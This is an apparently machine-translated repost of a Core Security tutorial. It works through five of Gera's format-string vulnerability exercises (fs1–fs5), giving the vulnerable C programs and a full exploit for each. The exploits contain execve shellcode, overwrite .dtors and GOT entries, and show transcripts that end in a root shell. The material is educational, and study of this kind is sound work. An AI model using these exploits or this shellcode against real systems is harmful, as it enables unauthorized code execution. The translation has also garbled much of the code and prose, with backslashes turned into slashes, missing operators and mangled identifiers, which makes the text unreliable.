[Analysis] Formatted character string of non-secure programming demonstrations Version1.1

xiaoxiao2021-03-06  20

Formatted string of non-secure programming demonstrations Version1.1

Creation time: 2003-03-07

Article attribute: translation

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Title: Formatted string of non-secure programming demonstrations Version1.1

Translation finishing: thorn (pH4NT0M)


http://www.ph4nt0m.net (phantom)

Chinese HTML version:


Version: 1.1

Updated: December 20,2002

Original address


Copyright: Core Security Team


table of Contents:


FS1.C analysis

FS2.c analysis

FS3.C analysis

FS4.C analysis

FS5.c analysis

in conclusion


Translator Note:

This article is published by Core Security, and 5 examples in INSECURE programming in Gera's Insecure Programming.

String vulnerability. Alert7 predecessors have written "formatted character string" of non-secure programming demonstration through these five examples.

I use the same name with me. If you have any mistakes in the translation, you should also urge the high-hand ax.


In this article, Core Security will display some errors that programmers in C language programs. Through Gera

5 examples to illustrate the problem with the Format String (formatted string). We will specify the bug in the program.

And will explain why this error is dangerous and will have an Exploit for each example. In this article,

The test of the test is Linux Slackware 8.0 Server (IA32), the compiler is GNU GCC 2.95.3:

User @ Corelabs: ~ $ uname -a

Linux Corelabs 2.4.5 # 31 SMP Sat Mar 2 03:04:23 EET 2002 I586 Unknown

User @ Corelabs: ~ $ GCC -V

Reading Specs from /usr/lib/gcc-lib/i386-slackware-linux/2.95.3/specs

GCC Version 2.95.3 20010315 (Release)

User @ Corelabs: ~ $ cat / proc / cpuinfo

Processor: 0

Vendor_id: GenuineIntel

CPU Family: 5

Model: 2

MODEL NAME: Pentium 75 - 200

User @ Corelabs: ~ $

We assume that the reader has C programming experience and has the basics of Stack overflow, Format String, Got, etc. in

These overflows will not be described in this article. If you are not familiar, please read the article in the article at the end of the article.

The updated version of this article may include format string information on other platforms, everyone can

Www.core-sec.com Download to the latest version.

If you have any questions, please contact: info@core-sec.com

FS1.C analysis

The code of this example is as follows

/ * fs1.c *

* specially crafted to feed your brey by gera@core-sdi.com * // * don't forget, *

* More is less, *

* here's a proof * /

INT Main (int Argv, char ** argc) {

Short int zero = 0;

INT * PLEN = (int *) Malloc (intend); SIZEOF (INT));

Char BUF [256];

// The next line is added by Core Security to Ease Exploitation.

Printf ("% p / n", & zero;

STRCPY (BUF, Argc [1]);

Printf ("% S% HN / N", BUF, PLEN;

While (ZERO);


This example is not bizarre. Below is the Man Page in Printf ():

N the number of character of character of character of character, s far is stored INTO THE

Integer INDICATED by the int * (or variant) Pointer Argument. no

Argument is converted.

H a following integer conversion corresponds to a short int or

Unsigned Short Int Argument, OR a FOLLOWING N Conversion Corresponds

TO a Pointer to a short int..

(Translator Note:% N means that the length of the display content is output to a variable.% H

Is converting the following content to a short int type)

If an attacker provides 260 Bytes long parameters, the last four bytes will overwrite the pointer * Plen. When the next execution

When printf (), some characters will be written in the memory pointed to by * Plen (this value by attacker control). however,

Due to the h in the format string, the attacker will only write two bytes (short write --- due to H conversion) to this memory

address. If the parameter provided is greater than 260 bytes, it will override ZERO, and this example will enter the dead cycle.

| _________________________ |

| Shellcode addr | /

| Shellcode addr | /

65276 BYTES

| Shellcode addr | /

| Shellcode addr | /

| ------------------------- | /

| Zero Address | 4 Bytes

| ------------------------ | /

| Aaaaaaa | /

| | | 256 BYTES

| Aaaaaaa | /

| ------------------------ |

| | |

Overflow is possible, but it is not easy. Attackers may adopt traditional attack processes, overwriting the program on the stack

Return the address. There is only one obstacle --- Deess loop. Argc [1] Need to be carefully constructed,

ZERO's inspection, if a null byte, the program will exit normally (this execute shellcode) (the translator Note: Bypass the dead cycle, because ZERO is 0, the While cycle ends). This can be done by the format parameters of% hn. ZERO is two

The byte length, the smaller number of two NULL bytes is 0x10000 (65536 16). So if argc [1]

It is 65536bytes long, * Plen points to the address of Zero, the dead cycle will be bypassed. The first 256 bytes of Argc [1]

Clippers (Translator Note: Used to fill the buffer), 4 bytes are the address of ZERO, and then the 65276 byte populates the shellcode address.

The real obstacle in this example is to find the address of Zero in the stack. This is our extra line in the example.

Print out the reason for the address of Zero. The EXPLOIT code is as follows:

/ *

** exp_fs1.c

** Coded by core security - info@core-sec.com

* /






/ * 24 Bytes shellcode * /

Char shellcode [] =

"/ x31 / xc0 / x50 / x68 / x2f / x2f / x73 / x68 / x68 / x2f / x62 / x69"

"/ x6e / x89 / xe3 / x50 / x53 / x89 / xe1 / x99 / xb0 / x0b / xcd / x80";

INT main (void) {

Char * env [3] = {shellcode, null};


Char * p;

int RET = 0xBffffffa - Strlen (Shellcode) -

Strlen ("/ home / user / gera / fs1");


Printf ("Shellcode Address: 0x% x / n", RET);

/ * Constructing the buffer * /

P = evIL_buffer;

MEMSET (P, 'A', 256);

P = 256;

* ((void **) p) = (void *) (ZERO_ADDRESS);

P = 4;

/ * 16319 x 4 = 65276 * /

For (i = 0; i <16319; i ) {

* ((void **) p) = (void *) (reset);

P = 4;


* p = '/ 0';

Execle ("/ Home / User / Gera / FS1", "FS1", Evil_Buffer, NULL, ENV);


FS2.c analysis

The code of this example is as follows:

/ * fs2.c *

* specially crafted to feed your brey by gera@core-sdi.com * /

/ * CAN you tell me what's Above the Edge? * /

INT Main (int Argv, char ** argc) {

Char BUF [256];

Snprintf (BUF, SIZEOF BUF, "% S% C% C% HN", Argc [1]); SnPrintf (buf, sizeof buf, "% S% C% C% HN", Argc [2]);


The programmer uses the "secure" function snprintf () to prevent overflow. However, he is in two calls.

The% HN parameters are used. If an attacker constructs a special buffer and transmits the formatted character to the past, then it will result

overflow. Note that the formatting parameters of SnPrintf () - "% s% c% hn" is from Argc [1] (ARGC [2] corresponding to the second

Snprintf ()). This is another error in the program.

The first formatted parameter is% s - it requires a pointer to String. Snprintf () function Processes Argc [1] in memory

Address until an NULL is encountered ('/ 0'). The second parameter is% C - corresponds to one integer. For example, if

The address of the argc [1] is 0xB f f F 764, snprintf () will handle character equivalent to the minimum effective word (Least Significant Byte)

(It is to understand) - 'd' (d = 0x64). The third parameter is also% C, the role and the previous parameter. First

The four parameters will be written to the number of characters that are currently Snprintf (). % HN saves a pointer as integer. it

Write the four bytes of the first four bytes in Argc [1] (all bytes) The four bytes points to the address (for example, if argc [1]

Like this "/ xbb / xaa / x41 / xbf / x41 / x41 / x41 / x41 / x43 / x44", then write address 0xBFFFAABB

). If Argc [1] has 600Bytes long, the value writes 0xBFFAABB will be 602 (600 from% s, 1 from% C, another

A second% C). Remember that% hn is a Short Write (2 BYTES), and the attacker has to cover him.

Divided into two parts for the address of the address of Shellcode

The attacker will pass the string of this example, will first contain 4 bytes (possibly a got entry address)

Then there are some garbage. The length of the string controls the value written to the Got Entry address. Here is a possible Exploit (

By covering the .dttors address of the HEAP):

/ *

** exp_fs2.c

** Coded by core security - info@core-sec.com

* /




#define objDump "/ usr / bin / objdump"

#define victim "/ home / user / gera / fs2"

#define grep "/ bin / grep"

/ * 24 Bytes shellcode * /

Char shellcode [] =

"/ x31 / xc0 / x50 / x68 / x2f / x2f / x73 / x68 / x68 / x2f / x62 / x69"

"/ x6e / x89 / xe3 / x50 / x53 / x89 / xe1 / x99 / xb0 / x0b / xcd / x80";

INT main (void) {

Char * env [3] = {shellcode, null};

Unsigned int first_half, second_half; char evil_buffer_1 [65500], eviL_buffer_2 [65500], temp_buffer [64];

Char * p;

Int dtors;

int RET = 0xBffffffa - Strlen (Shellcode) -

Strlen ("/ home / user / gera / fs2);

File * f;

Printf ("Shellcode Address: 0x% x / n", RET);

/ * Splitting shellcode address in two * /

First_HALF = (RET & 0xFFFF0000) >> 16;

Printf ("/ nshellcode address - first Half: 0x% x,% u / N", first_half,


Second_half = RET & 0x0000FFF;

Printf ("Shellcode Address - Second Half: 0x% x,% u / n", SECOND_HALF,


Sprintf (Temp_buffer, "% S -T% S |% s DTORS", Objdump, Victim, GREP);

f = POPEN (Temp_Buffer, "R");

IF (fscanf (f, "% x", & dtors)! = 1) {

PClose (f);

Printf ("Error: Cannot Find .dtors Address! / N");

Exit (1);


DTORS = 4;

Printf (". DTORS Address IS: 0x% x / n / n", dtors;

/ * First Buffer Writes First Half of Shellcode Address * /

P = evIL_buffer_1;

* ((void **) p) = (void *) (DTORS 2);

P = 4;

/ * 4 for .dtors addres and 2 for% C% C * /

MEMSET (P, 'A', (First_HALF - 4 - 2));

P = (First_HALF - 4 - 2);

* p = '/ 0';

/ * Second Buffer Writes Second Half of Shellcode Address * /

P = evIL_buffer_2;

* ((void **) p) = (void *) (dtors);

P = 4;

/ * 4 for .dtors addres and 2 for% C% C * /

MEMSET (P, 'B', (Second_HALF - 4 - 2);

P = (Second_HALF - 4 - 2);

* p = '/ 0';

Execle ("/ Home / User / Gera / FS2", "FS2", Evil_Buffer_1, Evil_Buffer_2,



Run as follows:

User @ Corelabs: ~ / Gera $ GCC fs2.c -o fs2

User @ Corelabs: ~ / Gera $ GCC Exp_fs2.c -o exp_fs2

User @ Corelabs: ~ / gera $ ./exp_fs2shellcode address: 0xBffffFFFCD

Shellcode Address - First Half: 0xBfff, 49151

Shellcode Address - Second Half: 0xffcd, 65485

.dtors address is: 0x8049590

SH-2.05 # EXIT


User @ Corelabs: ~ / gera $

The following is the case of Heap Memory when it is overflow:

/ | | | | | |

Got | | | | | |

/ | ______________________ | | ____________________________________________

/ | 0x00000000 | | 0xB f f 0000 | | 0xB f f f F c d |

.dtors | ------------------------------------- - | | ----------------------- |

/ | 0xf f f f f f | | 0xf f f f f f | | 0xf f f f f f |

| ------------------------------------- | | ----------------------- |

/ | 0x00000000 | | 0x00000000 | | 0x00000000 |

.ctors | --------------------------------- - | | ----------------------- |

/ | 0xf f f f f f | | 0xf f f f f f | | 0xf f f f f f |

| ------------------------------------- | | ----------------------- |

| | | | | | |

Before first snprintf () after first snprintf () after second snprintf ()

FS3.C analysis

The source code of the example is as follows:

/ * fs3.c *

* specially crafted to feed your brain by riq@core-sdi.com * /


INT Main (int Argv, char ** argc) {char buf [256];

Snprintf (buf, sizeof buf, "% s% C% C% HN", argc [1]);


It looks very similar to fs2.c. The difference is that the attacker can only write two bytes in memory, not enough

An exact memory address (4 bytes on 32-bit IA). If the attacker is smart enough, he will be in the appropriate address.

Override two bytes (for example, shellcode's address is 0xB f f f f B A, a return address is 0x b f f f A b c d, then

He will only cover Abcd with FFBA). This is an attacker to be overwritten. There are some possibilities here. First FS3 return address

(Determined in the stack --0xb fx x x x X X X X X X X X X X) It will be difficult to guess because of different environment variable stacks. Second Snprintf ()

The return address (also in the stack --0XB f X X X x determined) is also difficult to guess.

The address on the HEAP can be determined (you can get from the bin file). The third method is to cover the address of the.dtors.

Then this will not play a lot. Take a look at the figure of fs2.c. The address of the 0x00000000 is overlaid, change

It became one of the 0x0000F F B a or 0xB f F0000 --- is completely useless here. Then now the only possible way

Is the address of the __deregister_frame_info () in GOT:

User @ Corelabs: ~ / gera $ objdump -r ./fs3

./fs3: File Format ELF32-I386


Offset Type Value

080495CC R_386_GLOB_DAT __GMON_START__

080495BC R_386_jump_slot __register_frame_info

080495c0 r_386_jump_slot __deregister_frame_info

080495c4 r_386_jump_slot __libc_start_main

080495c8 r_386_jump_slot snprintf

User @ Corelabs: ~ / gera $

This coverage __deregister_frame_info () address is the first discovery and announcement of Core Security Team.

In general, this is a function existing in all GCC dynamic connection executable programs. It is at the end of a function

- Calls by calling exit (), Return (). Covering its address and override any function addresses in Got

it's the same. However, there is no suitable function in GOT in the example here.

The only way to overflow this example is to overwrite the __deregister_frame_info () with 0xB f F Frame_info ().

At the same time, save Shellcode inside Stack (a pile of NOP in front of Shellcode). From the output of Objdump from above

The address of __ derecister_frame_info () is 0x080495c0. After overlap, it will become 0xB f F 95c0. SHELLCODE address

Just at this point ---- via NOP increasing the chance of falling in the shellcode range.

In order to cover the success, Argc [1] must be 49151 - 2 = 49149 bytes, including shellcode and

__deregister_frame_info ()'s address. Argc [1] will be placed in memory (stack), such as from 0xB f F f A D7 to

0xB f f 3a d 7. The only problem that may exist here is that if the two minimum effective words of __deregister_frame_info () are greater than 0xF A D 7 or less than 0x3 a d 7 (this will not fall in NOP). According to statistics, this situation is probably

It is 25%, but in the actual situation (due to the memory allocation of Linux) will be less than 1% (translator Note: That is, the success rate will

It is relatively high.

| | |

| ------------------------- | <----- 0XB f f f A d 7

| Shellcode |

| ------------------------- |

| NOP ​​|

| NOP ​​|

| NOP ​​|> 0xB f f 95c0

| NOP ​​|

| NOP ​​|

| ------------------------- |


| --------------------------- | <---- 0XB f F 3a D7

| | |

Demo Exploit:

/ *

** exp_fs3.c

** Coded by core security - info@core-sec.com

* /




#define objDump "/ usr / bin / objdump"

#define victim "/ home / user / gera / fs3"

#define grep "/ bin / grep"

/ * 24 Bytes shellcode * /

Char shellcode [] =

"/ x31 / xc0 / x50 / x68 / x2f / x2f / x73 / x68 / x68 / x2f / x62 / x69"

"/ x6e / x89 / xe3 / x50 / x53 / x89 / xe1 / x99 / xb0 / x0b / xcd / x80";

INT main (void) {


Char * p;

INT deRegister_address;

File * f;

Sprintf (Temp_buffer, "% s -r% s |% s deregister", Objdump, Victim,


f = POPEN (Temp_Buffer, "R");

IF (fscanf (f, "% x", & deregister_address)! = 1) {

PClose (f);

Printf ("ERROR: Cannot Find Deregister Address IN GOT! / N");

Exit (1);


Printf ("Deregister Address IS: 0x% X / N", Deregister_Address;

/ * Evil buffer * /

P = evIL_buffer;

* ((void **) p) = (void *) (derecinter_address 2);

P = 4;

/ * Adding the nops * / memset (p, '/ x90', (Sizeof (Evil_Buffer) - Strlen (Shellcode) - 4 -


P = (SIZEOF (Evil_Buffer) - Strlen (Shellcode) - 4 - 1);

/ * Adding shellcode * /

Memcpy (p, shellcode, strlen);

P = strlen (shellcode);

* p = '/ 0';

Execl ("/ user / home / gera / fs3", "fs3", evil_buffer, null;


FS4.C analysis

The source code of this example is as follows:

/ * fs4.c *

* specially crafted to feed your brey by gera@core-sdi.com * /

/ * Have You Ever Heard About Code ReusAbility? * /

INT Main (int Argv, char ** argc) {

Char BUF [256];

Snprintf (buf, sizeof buf, "% s% 6 $ hn", argc [1]);

Printf (BUF);


The method of overflow is substantially the same as FS3.C. Here is a formatted parameter here - "6 $".

This means that% hn will cover the address pointed to by the sixth parameter. In order to successfully overflow, the first 8 bytes of Argc [1] should be filled

Garbage (reason for the reader). Another change is that it is not __deregister_frame_info () in Exploit.

Address but is the address of the Printf () (there is no impact here):

/ *

** exp_fs4.c

** Coded by core security - info@core-sec.com

* /




#define objDump "/ usr / bin / objdump"

#define Victim "/ Home / User / Gera / FS4"

#define grep "/ bin / grep"

/ * 24 Bytes shellcode * /

Char shellcode [] =

"/ x31 / xc0 / x50 / x68 / x2f / x2f / x73 / x68 / x68 / x2f / x62 / x69"

"/ x6e / x89 / xe3 / x50 / x53 / x89 / xe1 / x99 / xb0 / x0b / xcd / x80";

INT main (void) {

Char Evil_Buffer [49151 1], TEMP_BUFFER [64];

Char * p;

INT Printf_address;

File * f;

Sprintf (Temp_buffer, "% s -r% s |% s printf", Objdump, Victim,


f = POPEN (Temp_Buffer, "R");

IF (fscanf (f, "% x", &printf_address)! = 1) {

PClose (f);

Printf ("Error: Cannot Find Printf () Address IN GOT! / N");

Exit (1);


Printf ("Printf () Address IN GOT IS: 0x% X / N", Printf_address); / * Evil Buffer * /

P = evIL_buffer;

/ * Some Junk Here * /

MEMSET (P, 'B', 8);

P = 8;

* ((void **) p) = (void *) (Printf_address 2);

P = 4;

/ * Adding NOPS. 12 = 8 (for Junk) 4 (for address) * /

MEMSET (P, '/ X90', (SIZEOF (Evil_Buffer) - Strlen (Shellcode) - 12 - 12 -


P = (SIZEOF (Evil_Buffer) - Strlen (Shellcode) - 12 - 1);

/ * Adding shellcode * /

Memcpy (p, shellcode, strlen);

P = strlen (shellcode);

* p = '/ 0';

EXECL ("/ Home / User / Gera / FS4", "FS4", Evil_Buffer, NULL


FS5.c analysis

This source code is as follows:

/ * fs5.c *

* specially crafted to feed your brey by gera@core-sdi.com * /

/ * GO, Go, Go! * /

INT Main (int Argv, char ** argc) {

Char BUF [256];

Snprintf (buf, sizeof buf, argc [1]);

/ * this line'll make your life easier * /

Printf ("% S / N", BUF);


Finally, let us look at a classic Format String vulnerability. No need to explain too much, this overflow is very

Typical, if you have any questions, please read the wonderful discussion of Scut (Translator Note: The latest version is "format string -1.2"

). It will automatically be automatically accurately positioned - only for educational purposes. This is the last line (Printf ("% S / N", BUF);) Note.

(Translator Note: For the convenience of automatic precise positioning ?? Please see the article about the automatic precise positioning of Alert7)

User @ Corelabs: ~ / gera $ ./exp_fs5

Reading Stack Frames ...

Frame 01 -> 40016478

Frame 02-> 00000001

Frame 03-> bffff8f8

Frame 04-> 41414141

Exact Match Found. Stack Pop IS: 4

_Deregister address in got IS: 0x080495ac

Shellcode Address in Stack IS: 0xBffffFFFFCD

?? 0000000000000000000000000000000000000000000000000000000000000000000000000



SH-2.05 # EXIT


User @ Corelabs: ~ / gera $

Demonstration Explloy is as follows:

/ *

** exp_fs5.c

** Coded by core security - info@core-sec.com

* /




#define objDump "/ usr / bin / objdump"

#define Victim "/ Home / User / Gera / FS5"

#define grep "/ bin / grep"

/ * 24 Bytes shellcode * /

Char shellcode [] =

"/ x31 / xc0 / x50 / x68 / x2f / x2f / x73 / x68 / x68 / x2f / x62 / x69"

"/ x6e / x89 / xe3 / x50 / x53 / x89 / xe1 / x99 / xb0 / x0b / xcd / x80";

Int main () {

Char Evil_Buffer [256], TEMP_BUFFER [256];

Char * env [3] = {shellcode, null};

Char * p;

INT deRegister_address, first_half, second_half, i;

File * f;

int RET = 0xBffffffa - Strlen (Shellcode) -

Strlen ("/ Home / User / Gera / FS5);

Bzero (Evil_Buffer, Sizeof);

Sprintf (Evil_Buffer, "% s AAAA", VICTIM);

/ * Finding Stack Pop * /

Printf ("/ Nream Frames ... / N");

For (i = 0; i <30; i ) {

STRCAT (Evil_Buffer, "% 08X");

f = POPEN (Evil_Buffer, "R");

Fscanf (f, "% s", temp_buffer;

P = Temp_buffer (4 i * 8);

Printf ("frame% .2d ->% s / n", (i 1), p);

IF (! STRCMP (P, "41414141")) {

Printf ("/ Nexact Match Found. Stack Pop IS:

% D / N / N ", I 1);

PClose (f);



PClose (f);

Bzero (Temp_buffer, Sizeof (Temp_buffer);


IF (i == 30) {

Printf ("Can't Find Our Format String in Stack./N");

Printf ("Some Padding MAY Be Neededed. Aborting ... / N");

Exit (1);


Sprintf (Temp_buffer, "% s -r% s |% s deregister", Objdump, Victim,


f = POPEN (Temp_buffer, "R"); if (fscanf (f, "% 08x", & deregister_address)! = 1) {

PClose (f);

Printf ("ERROR: Cannot Find Deregister Address IN GOT! / N");

Exit (1);


PClose (f);

Printf ("_ deregister address in got is: 0x% 08x / n",


Printf ("Shellcode Address in Stack IS: 0x% 08X / N / N", RET);

First_HALF = (RET & 0xFFFF0000) >> 16;

Second_half = (RET & 0x0000FFFF);

/ * Evil buffer construction * /

P = evIL_buffer;

Bzero (p, sizeof (eviL_buffer);

/ * first_half * /

* ((void **) p) = (void *) (derecinter_address 2);

P = 4;

/ * second_half * /

* ((void **) p) = (Void *) (DEREGISTER_ADDRESS);

P = 4;

Sprintf (p, "%%.% ud %%% D $ hn" "%%.% ud %%% D $ hn", first_half - 8, i 1,

Second_half - first_half, i 2);

Execle ("/ home / user / gera / fs5", "fs5", evil_buffer, null, eNV);


in conclusion

Format strings is easier to discover (relatively unfair to discover, even if it is very careful.

Check the source code). The vulnerability existing in the automatic detection tool detection code is usually useful. So why

What is considered to have a big threat? Format strings vulnerability? The reason is that it is detrimental to the time - until 2000

. Since the programmer is lazy, there is a lot of Format String bug in many old daemons and applications.

Formatted string vulnerabilities will not be avoided in the future will bring a lot of security issues.


GERA, "INSECURE Programming By Example"


2. Scut, "Exploiting Format String Vulnerabilities"


3. Aleph One, "Smashing The Stack for Fun and Profit"


4. Linux Programmer's Manual, Snprintf () Function


5. Core Security Team, "Vulnerabilities in Your Code - Advanced Buffer overflows"


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